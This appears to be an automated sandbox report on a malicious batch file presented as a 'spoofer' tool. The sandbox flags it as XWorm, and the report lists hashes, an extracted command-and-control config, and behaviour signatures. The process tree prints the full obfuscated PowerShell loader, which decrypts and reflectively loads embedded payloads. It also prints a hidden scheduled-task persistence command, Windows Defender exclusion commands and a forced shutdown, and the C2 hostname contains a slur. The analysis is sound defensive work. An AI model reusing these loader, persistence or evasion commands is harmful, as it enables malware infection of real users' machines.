Analysis
-
max time kernel
31s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-01-2025 14:57
Static task
static1
Behavioral task
behavioral1
Sample
EzSpoofer.bat
Resource
win7-20240903-en
Errors
General
-
Target
EzSpoofer.bat
-
Size
262KB
-
MD5
1298934b3f4c37d349794f0686c6e7a8
-
SHA1
9a6848b79ba8aba796514526898b4c9217301bc0
-
SHA256
2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
-
SHA512
ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
-
SSDEEP
6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9
Malware Config
Extracted
xworm
IDKTOBEHONESTNIGAS-56344.portmap.io:56344
RRwG35fodUbwRp96
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3392-49-0x0000029EDE570000-0x0000029EDE580000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 17 IoCs
flow pid Process 14 3392 powershell.exe 25 3392 powershell.exe 29 3392 powershell.exe 30 3392 powershell.exe 37 3392 powershell.exe 38 3392 powershell.exe 39 3392 powershell.exe 41 3392 powershell.exe 42 3392 powershell.exe 43 3392 powershell.exe 44 3392 powershell.exe 46 3392 powershell.exe 47 3392 powershell.exe 48 3392 powershell.exe 49 3392 powershell.exe 50 3392 powershell.exe 51 3392 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2620 powershell.exe 3056 powershell.exe 3392 powershell.exe 3908 powershell.exe 3628 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "157" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2620 powershell.exe 2620 powershell.exe 3056 powershell.exe 3056 powershell.exe 3392 powershell.exe 3392 powershell.exe 3908 powershell.exe 3908 powershell.exe 3628 powershell.exe 3628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe Token: 36 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe Token: 36 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3080 LogonUI.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3444 wrote to memory of 2620 3444 cmd.exe 85 PID 3444 wrote to memory of 2620 3444 cmd.exe 85 PID 2620 wrote to memory of 3056 2620 powershell.exe 86 PID 2620 wrote to memory of 3056 2620 powershell.exe 86 PID 2620 wrote to memory of 1172 2620 powershell.exe 89 PID 2620 wrote to memory of 1172 2620 powershell.exe 89 PID 1172 wrote to memory of 4348 1172 WScript.exe 90 PID 1172 wrote to memory of 4348 1172 WScript.exe 90 PID 4348 wrote to memory of 3392 4348 cmd.exe 92 PID 4348 wrote to memory of 3392 4348 cmd.exe 92 PID 3392 wrote to memory of 3908 3392 powershell.exe 93 PID 3392 wrote to memory of 3908 3392 powershell.exe 93 PID 3392 wrote to memory of 3628 3392 powershell.exe 95 PID 3392 wrote to memory of 3628 3392 powershell.exe 95 PID 3392 wrote to memory of 3388 3392 powershell.exe 110 PID 3392 wrote to memory of 3388 3392 powershell.exe 110
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_102_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_102.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_102.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_102.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_102.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_102.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /s /t 06⤵PID:3388
-
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4748
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa394a055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3080
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:4608
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5f8d49a4af7a844bfc7247d5670def557
SHA126ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA25661c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA5129e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
262KB
MD51298934b3f4c37d349794f0686c6e7a8
SHA19a6848b79ba8aba796514526898b4c9217301bc0
SHA2562bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
SHA512ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
-
Filesize
115B
MD5fa828c788fb01f5cc261a8160c790738
SHA1042d652368dd1a2e28dd2a0aba603a604d36b758
SHA25636b71f72aa112764d2142b012a22f207e03977825c7e7f201b4db7e27af86bb1
SHA51225d7a545eea374674d89d9e69cf46fc60506e9cb6b8f329d75f61d09707915075813a906abc0975df0d422b1b9e9c1555f7432efba6dd444d7abf699dc0224bf